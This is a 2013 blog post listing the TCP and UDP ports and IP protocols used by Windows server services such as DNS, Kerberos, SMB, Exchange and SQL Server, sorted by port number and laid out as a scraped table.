unplanned.
xx is the major reason number (positive integer less than 256).
yy is the minor reason number (positive integer less than 65536)
Monday, May 27, 2013
Ports and Protocols
Sorted
by port number:
Port
|
Protocol
|
Application
protocol
|
System
Service Name
|
n/a
|
GRE
|
GRE (IP
protocol 47)
|
Routing
and Remote Access
|
n/a
|
ESP
|
IPSec
ESP (IP protocol 50)
|
Routing
and Remote Access
|
n/a
|
AH
|
IPSec AH
(IP protocol 51)
|
Routing
and Remote Access
|
7
|
TCP
|
Echo
|
Simple
TCP/IP Services
|
7
|
UDP
|
Echo
|
Simple
TCP/IP Services
|
9
|
TCP
|
Discard
|
Simple
TCP/IP Services
|
9
|
UDP
|
Discard
|
Simple
TCP/IP Services
|
13
|
TCP
|
Daytime
|
Simple
TCP/IP Services
|
13
|
UDP
|
Daytime
|
Simple
TCP/IP Services
|
17
|
TCP
|
Quotd
|
Simple
TCP/IP Services
|
17
|
UDP
|
Quotd
|
Simple
TCP/IP Services
|
19
|
TCP
|
Chargen
|
Simple
TCP/IP Services
|
19
|
UDP
|
Chargen
|
Simple
TCP/IP Services
|
20
|
TCP
|
FTP
default data
|
FTP
Publishing Service
|
21
|
TCP
|
FTP
control
|
FTP
Publishing Service
|
21
|
TCP
|
FTP
control
|
Application
Layer Gateway Service
|
23
|
TCP
|
Telnet
|
Telnet
|
25
|
TCP
|
SMTP
|
Simple
Mail Transfer Protocol
|
25
|
UDP
|
SMTP
|
Simple
Mail Transfer Protocol
|
25
|
TCP
|
SMTP
|
Exchange
Server
|
25
|
UDP
|
SMTP
|
Exchange
Server
|
42
|
TCP
|
WINS
Replication
|
Windows
Internet Name Service
|
42
|
UDP
|
WINS
Replication
|
Windows
Internet Name Service
|
53
|
TCP
|
DNS
|
DNS
Server
|
53
|
UDP
|
DNS
|
DNS
Server
|
53
|
TCP
|
DNS
|
Internet
Connection Firewall/Internet Connection Sharing
|
67
|
UDP
|
DHCP
Server
|
DHCP
Server
|
67
|
UDP
|
DHCP
Server
|
Internet
Connection Firewall/Internet Connection Sharing
|
69
|
UDP
|
TFTP
|
Trivial
FTP Daemon Service
|
80
|
TCP
|
HTTP
|
Windows
Media Services
|
80
|
TCP
|
HTTP
|
World
Wide Web Publishing Service
|
80
|
TCP
|
HTTP
|
SharePoint
Portal Server
|
88
|
TCP
|
Kerberos
|
Kerberos
Key Distribution Center
|
88
|
UDP
|
Kerberos
|
Kerberos
Key Distribution Center
|
102
|
TCP
|
X.400
|
Microsoft
Exchange MTA Stacks
|
110
|
TCP
|
POP3
|
Microsoft
POP3 Service
|
110
|
TCP
|
POP3
|
Exchange
Server
|
119
|
TCP
|
NNTP
|
Network
News Transfer Protocol
|
123
|
UDP
|
NTP
|
Windows
Time
|
123
|
UDP
|
SNTP
|
Windows
Time
|
135
|
TCP
|
RPC
|
Message
Queuing
|
135
|
TCP
|
RPC
|
Remote
Procedure Call
|
135
|
TCP
|
RPC
|
Exchange
Server
|
135
|
TCP
|
RPC
|
Certificate
Services
|
135
|
TCP
|
RPC
|
Cluster
Service
|
135
|
TCP
|
RPC
|
Distributed
File System
|
135
|
TCP
|
RPC
|
Distributed
Link Tracking
|
135
|
TCP
|
RPC
|
Distributed
Transaction Coordinator
|
135
|
TCP
|
RPC
|
Event
Log
|
135
|
TCP
|
RPC
|
Fax
Service
|
135
|
TCP
|
RPC
|
File
Replication
|
135
|
TCP
|
RPC
|
Local
Security Authority
|
135
|
TCP
|
RPC
|
Remote
Storage Notification
|
135
|
TCP
|
RPC
|
Remote
Storage Server
|
135
|
TCP
|
RPC
|
Systems
Management Server 2.0
|
135
|
TCP
|
RPC
|
Terminal
Services Licensing
|
135
|
TCP
|
RPC
|
Terminal
Services Session Directory
|
137
|
UDP
|
NetBIOS
Name Resolution
|
Computer
Browser
|
137
|
UDP
|
NetBIOS
Name Resolution
|
Server
|
137
|
UDP
|
NetBIOS
Name Resolution
|
Windows
Internet Name Service
|
137
|
UDP
|
NetBIOS
Name Resolution
|
Net
Logon
|
137
|
UDP
|
NetBIOS
Name Resolution
|
Systems
Management Server 2.0
|
138
|
UDP
|
NetBIOS
Datagram Service
|
Computer
Browser
|
138
|
UDP
|
NetBIOS
Datagram Service
|
Messenger
|
138
|
UDP
|
NetBIOS
Datagram Service
|
Server
|
138
|
UDP
|
NetBIOS
Datagram Service
|
Net
Logon
|
138
|
UDP
|
NetBIOS
Datagram Service
|
Distributed
File System
|
138
|
UDP
|
NetBIOS
Datagram Service
|
Systems
Management Server 2.0
|
138
|
UDP
|
NetBIOS
Datagram Service
|
License
Logging Service
|
139
|
TCP
|
NetBIOS
Session Service
|
Computer
Browser
|
139
|
TCP
|
NetBIOS
Session Service
|
Fax
Service
|
139
|
TCP
|
NetBIOS
Session Service
|
Performance
Logs and Alerts
|
139
|
TCP
|
NetBIOS
Session Service
|
Print
Spooler
|
139
|
TCP
|
NetBIOS
Session Service
|
Server
|
139
|
TCP
|
NetBIOS
Session Service
|
Net
Logon
|
139
|
TCP
|
NetBIOS
Session Service
|
Remote
Procedure Call Locator
|
139
|
TCP
|
NetBIOS
Session Service
|
Distributed
File System
|
139
|
TCP
|
NetBIOS
Session Service
|
Systems
Management Server 2.0
|
139
|
TCP
|
NetBIOS
Session Service
|
License
Logging Service
|
143
|
TCP
|
IMAP
|
Exchange
Server
|
161
|
UDP
|
SNMP
|
SNMP
Service
|
162
|
UDP
|
SNMP
Traps Outbound
|
SNMP
Trap Service
|
389
|
TCP
|
LDAP
Server
|
Local
Security Authority
|
389
|
UDP
|
LDAP
Server
|
Local
Security Authority
|
389
|
TCP
|
LDAP
Server
|
Distributed
File System
|
389
|
UDP
|
LDAP
Server
|
Distributed
File System
|
443
|
TCP
|
HTTPS
|
HTTP SSL
|
443
|
TCP
|
HTTPS
|
World
Wide Web Publishing Service
|
443
|
TCP
|
HTTPS
|
SharePoint
Portal Server
|
445
|
TCP
|
SMB
|
Fax
Service
|
445
|
TCP
|
SMB
|
Print
Spooler
|
445
|
TCP
|
SMB
|
Server
|
445
|
TCP
|
SMB
|
Remote
Procedure Call Locator
|
445
|
TCP
|
SMB
|
Distributed
File System
|
445
|
TCP
|
SMB
|
License
Logging Service
|
445
|
TCP
|
SMB
|
Net
Logon
|
500
|
UDP
|
IPSec
ISAKMP
|
Local
Security Authority
|
515
|
TCP
|
LPD
|
TCP/IP
Print Server
|
548
|
TCP
|
File
Server for Macintosh
|
File
Server for Macintosh
|
554
|
TCP
|
RTSP
|
Windows
Media Services
|
563
|
TCP
|
NNTP
over SSL
|
Network
News Transfer Protocol
|
593
|
TCP
|
RPC over
HTTP
|
Remote
Procedure Call
|
593
|
TCP
|
RPC over
HTTP
|
Exchange
Server
|
636
|
TCP
|
LDAP SSL
|
Local
Security Authority
|
636
|
UDP
|
LDAP SSL
|
Local
Security Authority
|
993
|
TCP
|
IMAP
over SSL
|
Exchange
Server
|
995
|
TCP
|
POP3
over SSL
|
Exchange
Server
|
1270
|
TCP
|
MOM-Encrypted
|
Microsoft
Operations Manager 2000
|
1433
|
TCP
|
SQL over
TCP
|
Microsoft
SQL Server
|
1433
|
TCP
|
SQL over
TCP
|
MSSQL$UDDI
|
1434
|
UDP
|
SQL
Probe
|
Microsoft
SQL Server
|
1434
|
UDP
|
SQL
Probe
|
MSSQL$UDDI
|
1645
|
UDP
|
Legacy
RADIUS
|
Internet
Authentication Service
|
1646
|
UDP
|
Legacy
RADIUS
|
Internet
Authentication Service
|
1701
|
UDP
|
L2TP
|
Routing
and Remote Access
|
1723
|
TCP
|
PPTP
|
Routing
and Remote Access
|
1755
|
TCP
|
MMS
|
Windows
Media Services
|
1755
|
UDP
|
MMS
|
Windows
Media Services
|
1801
|
TCP
|
MSMQ
|
Message
Queuing
|
1801
|
UDP
|
MSMQ
|
Message
Queuing
|
1812
|
UDP
|
RADIUS
Authentication
|
Internet
Authentication Service
|
1813
|
UDP
|
RADIUS
Accounting
|
Internet
Authentication Service
|
1900
|
UDP
|
SSDP
|
SSDP
Discovery Service
|
2101
|
TCP
|
MSMQ-DCs
|
Message
Queuing
|
2103
|
TCP
|
MSMQ-RPC
|
Message
Queuing
|
2105
|
TCP
|
MSMQ-RPC
|
Message
Queuing
|
2107
|
TCP
|
MSMQ-Mgmt
|
Message
Queuing
|
2393
|
TCP
|
OLAP Services
7.0
|
SQL
Server: Downlevel OLAP Client Support
|
2394
|
TCP
|
OLAP
Services 7.0
|
SQL
Server: Downlevel OLAP Client Support
|
2460
|
UDP
|
MS
Theater
|
Windows
Media Services
|
2535
|
UDP
|
MADCAP
|
DHCP
Server
|
2701
|
TCP
|
SMS
Remote Control (control)
|
SMS
Remote Control Agent
|
2701
|
UDP
|
SMS
Remote Control (control)
|
SMS
Remote Control Agent
|
2702
|
TCP
|
SMS
Remote Control (data)
|
SMS
Remote Control Agent
|
2702
|
UDP
|
SMS
Remote Control (data)
|
SMS
Remote Control Agent
|
2703
|
TCP
|
SMS
Remote Chat
|
SMS
Remote Control Agent
|
2703
|
UPD
|
SMS
Remote Chat
|
SMS
Remote Control Agent
|
2704
|
TCP
|
SMS
Remote File Transfer
|
SMS
Remote Control Agent
|
2704
|
UDP
|
SMS
Remote File Transfer
|
SMS
Remote Control Agent
|
2725
|
TCP
|
SQL
Analysis Services
|
SQL
Analysis Server
|
2869
|
TCP
|
UPNP
|
UPNP
Device Host
|
2869
|
TCP
|
SSDP
event notification
|
SSDP
Discovery Service
|
3268
|
TCP
|
Global
Catalog Server
|
Local
Security Authority
|
3269
|
TCP
|
Global
Catalog Server
|
Local
Security Authority
|
3343
|
UDP
|
Cluster
Services
|
Cluster
Service
|
3389
|
TCP
|
Terminal
Services
|
NetMeeting
Remote Desktop Sharing
|
3389
|
TCP
|
Terminal
Services
|
Terminal
Services
|
3527
|
UDP
|
MSMQ-Ping
|
Message
Queuing
|
4011
|
UDP
|
BINL
|
Remote
Installation
|
4500
|
UDP
|
NAT-T
|
Local
Security Authority
|
5000
|
TCP
|
SSDP
legacy event notification
|
SSDP
Discovery Service
|
5004
|
UDP
|
RTP
|
Windows Media
Services
|
5005
|
UDP
|
RTCP
|
Windows
Media Services
|
42424
|
TCP
|
ASP.Net
Session State
|
ASP.NET
State Service
|
51515
|
TCP
|
MOM-Clear
|
Microsoft
Operations Manager 2000
|
Subscribe to:
Posts (Atom)